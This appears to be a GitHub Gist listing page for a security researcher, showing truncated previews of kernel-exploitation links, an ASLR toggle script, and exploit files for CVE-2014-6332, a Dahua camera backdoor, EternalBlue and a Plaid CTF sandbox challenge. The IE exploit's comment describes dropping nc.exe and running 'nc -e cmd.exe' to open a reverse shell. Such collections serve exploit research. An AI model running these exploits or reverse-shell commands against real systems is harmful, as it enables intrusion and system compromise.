This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://phrack.org/issues/64/6.html | |
| https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf | |
| http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/ | |
| http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections | |
| http://www.slideshare.net/sciosecurity/linux-kernel-exploitation | |
| http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf | |
| https://github.com/xairy/kaslr-bypass-via-prefetch | |
| http://www.jikos.cz/jikos/Kmalloc_Internals.html | |
| https://github.com/Fuzion24/AndroidKernelExploitationPlayground | |
| http://dcjtech.info/topic/linux-kernel-slab-allocators/ |
huyna
/ DisableASLR-win10.bat
Last active
June 17, 2022 17:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ECHO OFF | |
| SETLOCAL | |
| ECHO ASLR Enable / Diable Batch Script - Please run as admin | |
| set /p Choice=Want to Enable or Disable ASLR? (e or d):%=% | |
| if "%Choice%"=="e" goto :ENABLE | |
| if "%Choice%"=="d" goto :DISABLE | |
| :ENABLE |
huyna
/ cve-2014-6332_exploit.html
Created
December 15, 2015 02:34
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
huyna
/ dahua-backdoor.py
Created
November 16, 2017 01:14
— forked from cre8tions/dahua-backdoor.py
dahua exploit poc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |
huyna
/ eternalblue8_exploit.py
Created
May 18, 2017 01:50
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
huyna
/ eternalblue_exploit.py
Created
May 16, 2017 07:59
— forked from worawit/eternalblue7_exploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
huyna
/ extracting-tuesday-patches.ps
Created
October 16, 2015 01:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ================ | |
| PATCHEXTRACT.PS1 | |
| ================= | |
| Microsoft MSU Patch Extraction and Patch OrganizationUtility by Greg Linares (@Laughing_Mantis) | |
| This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. | |
| Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) | |
| as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will |
huyna
/ js_sandbox.js
Created
April 26, 2017 02:00
— forked from sroettger/js_sandbox.js
Exploit for the js_sandbox challenge of Plaid CTF 2016
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| with (true) { | |
| // f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16. | |
| // take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening | |
| function f(){ | |
| var x = 8; | |
| var y = 0xffffffff; | |
| var ind = x & y; | |
| x = 16; | |
| y = 0xffffffff; | |
| var ind2 = ind + (x&y); |
huyna
/ Change Post-Mortem Debugger
Created
August 31, 2016 15:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Click "Start" and "Run." | |
| Type "regedit" without the quotation marks to open the registry editor. | |
| Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft, "WindowsNT," "Current Version" and "AeDebug." | |
| Double-click the registry key "Debugger" on the right-window pane. | |
| Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default. | |
| Click "OK" and close the registry editor. |
huyna
/ PageHeap Error Windbg10
Created
October 14, 2015 03:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1:064> !heap -p -a 080b8c30 | |
| ReadMemory error for address 00000000 | |
| Use `!address 00000000' to check validity of the address. | |
| ReadMemory error for address 0e4c6f3a | |
| Use `!address 0e4c6f3a' to check validity of the address. | |
| ReadMemory error for address 00000000 | |
| Use `!address 00000000' to check validity of the address. | |
| ReadMemory error for address 09cf6f3a | |
| Use `!address 09cf6f3a' to check validity of the address. | |
| ReadMemory error for address 06cf6f3a |
NewerOlder